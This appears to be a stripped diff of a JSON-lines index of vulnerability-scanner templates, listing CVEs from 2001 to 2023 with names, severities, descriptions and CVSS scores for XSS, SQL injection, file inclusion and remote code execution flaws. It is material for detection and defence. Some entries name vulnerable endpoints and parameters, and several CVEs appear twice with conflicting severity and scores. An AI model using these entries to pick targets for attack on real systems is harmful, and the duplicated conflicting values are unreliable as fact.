{"ID":"CVE-2023-39598","Info":{"Name":"IceWarp Email Client - Cross Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39598.yaml"}
{"ID":"CVE-2023-39598","Info":{"Name":"IceWarp Email Client - Cross Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39598.yaml"}
{"ID":"CVE-2023-39600","Info":{"Name":"IceWarp 11.4.6.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39600.yaml"}
{"ID":"CVE-2023-39676","Info":{"Name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","Severity":"medium","Description":"Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39676.yaml"}
{"ID":"CVE-2023-39677","Info":{"Name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","Severity":"low","Description":"PrestaShop modules by MyPrestaModules expose PHPInfo\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39677.yaml"}
{"ID":"CVE-2023-39676","Info":{"Name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","Severity":"medium","Description":"Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39676.yaml"}
{"ID":"CVE-2023-39677","Info":{"Name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","Severity":"high","Description":"PrestaShop modules by MyPrestaModules expose PHPInfo\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39677.yaml"}
{"ID":"CVE-2023-39700","Info":{"Name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39700.yaml"}
{"ID":"CVE-2023-39796","Info":{"Name":"WBCE 1.6.0 - SQL Injection","Severity":"critical","Description":"There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39796.yaml"}
{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
{"ID":"CVE-2023-4111","Info":{"Name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4111.yaml"}
{"ID":"CVE-2023-4112","Info":{"Name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4112.yaml"}
{"ID":"CVE-2023-4113","Info":{"Name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4113.yaml"}
{"ID":"CVE-2023-4114","Info":{"Name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4114.yaml"}
{"ID":"CVE-2023-4115","Info":{"Name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4115.yaml"}
{"ID":"CVE-2023-4116","Info":{"Name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4116.yaml"}
{"ID":"CVE-2023-41265","Info":{"Name":"Qlik Sense Enterprise - HTTP Request Smuggling","Severity":"critical","Description":"An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2023/CVE-2023-41265.yaml"}
{"ID":"CVE-2023-41266","Info":{"Name":"Qlik Sense Enterprise - Path Traversal","Severity":"medium","Description":"A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-41266.yaml"}
{"ID":"CVE-2023-4148","Info":{"Name":"Ditty \u003c 3.1.25 - Cross-Site Scripting","Severity":"medium","Description":"The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4148.yaml"}
{"ID":"CVE-2023-41538","Info":{"Name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","Severity":"medium","Description":"PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41538.yaml"}
{"ID":"CVE-2023-41642","Info":{"Name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","Severity":"medium","Description":"Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41642.yaml"}
{"ID":"CVE-2023-4168","Info":{"Name":"Adlisting Classified Ads 2.14.0 - Information Disclosure","Severity":"high","Description":"Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4168.yaml"}
{"ID":"CVE-2023-4169","Info":{"Name":"Ruijie RG-EW1200G Router - Password Reset","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4169.yaml"}
{"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
{"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"high","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
{"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"}
{"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
{"ID":"CVE-2023-43795","Info":{"Name":"GeoServer WPS - Server Side Request Forgery","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43795.yaml"}
{"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"}
{"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"}
{"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"}
{"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"}
{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"}
{"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"}
{"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
{"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
{"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}
{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
{"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"}
{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
{"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"}
{"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"}
{"ID":"CVE-2023-5375","Info":{"Name":"Mosparo \u003c 1.0.2 - Open Redirect","Severity":"medium","Description":"Open Redirect in GitHub repository mosparo/mosparo prior to 1.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5375.yaml"}
{"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"}
{"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"}
{"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"}
{"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"}
{"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"}
{"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"}
{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
@ -2046,7 +2250,7 @@
{"ID":"CVE-2020-1938","Info":{"Name":"Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability","Severity":"critical","Description":"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-1938.yaml"}
